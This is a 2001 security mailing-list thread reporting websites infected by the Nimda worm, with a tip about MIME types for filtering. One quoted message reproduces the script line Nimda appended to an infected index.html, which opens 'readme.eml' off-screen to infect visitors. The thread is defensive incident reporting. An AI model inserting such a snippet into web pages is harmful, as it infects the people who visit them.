Security Incidents mailing list archives
RE: Web site infected by Nimda
From: "John Q. Public" <tpublic () dimensional com>
Date: Wed, 19 Sep 2001 11:25:24 -0600 (MDT)
Interestingly, the content type from www.wininternals.com (aka 207.30.43.69,
aka underconstruction.infoback.net) is application/octet-stream. The content
type on www.digimind.fr is correct at "message/rfc822."
Something to keep in mind if you're setting up filters.
.nhoJ
On Wed, 19 Sep 2001, Jac Engel wrote:
|Date: Wed, 19 Sep 2001 19:07:22 +0200
|From: Jac Engel <jacengel () home nl>
|To: "acz [iSecureLabs]" <aurelien.cabezon () iSecureLabs com>,
incidents () securityfocus com
|Subject: RE: Web site infected by Nimda
|
|http://www.wininternals.com is also infected by Nimda Virus,
|after the page is loaded I get a new page
|saying :
|You have encountered the following error while using Windows Media Player:
|----------------------------------------------------------------------------
|----
|Error# 8007000D
|Sorry, no more help is available for this problem at this time.
|
|Jac
|
|-----Original Message-----
|From: acz [iSecureLabs] [mailto:aurelien.cabezon () iSecureLabs com]
|Sent: Sunday, September 19, 1999 5:46 PM
|To: incidents () securityfocus com
|Subject: Web site infected by Nimda
|
|
|Hi all,
|
|http://www.digimind.fr/ is infected by Nimda virus !
|
|This line was added at the end of the index.html
|
|---<cut>---
|<html><script language="JavaScript">window.open("readme.eml", null,
|"resizable=no,top=6000,left=6000")</script></html>
|---<cut>---
|
|If you wanna visit digimind.fr, turn your webbrowser javascript off !
|
|---
|Cabezon Aurelien
|http://www.iSecureLabs.com
|
|
|----------------------------------------------------------------------------
|This list is provided by the SecurityFocus ARIS analyzer service.
|For more information on this free incident handling, management
|and tracking system please see: http://aris.securityfocus.com
|
|
|----------------------------------------------------------------------------
|This list is provided by the SecurityFocus ARIS analyzer service.
|For more information on this free incident handling, management
|and tracking system please see: http://aris.securityfocus.com
|
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Current thread:
- Nimda - collected information Berislav Kucan (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- RE: Web site infected by Nimda Ken Pfeil (Sep 19)
- RE: Web site infected by Nimda John Q. Public (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Nick FitzGerald (Sep 19)
- Re: MIME type of readme.eml (was Re: Web site infected by Nimda Rob Quinn (Sep 20)
- RE: Web site infected by Nimda Jac Engel (Sep 19)
- Web site infected by Nimda acz [iSecureLabs] (Sep 19)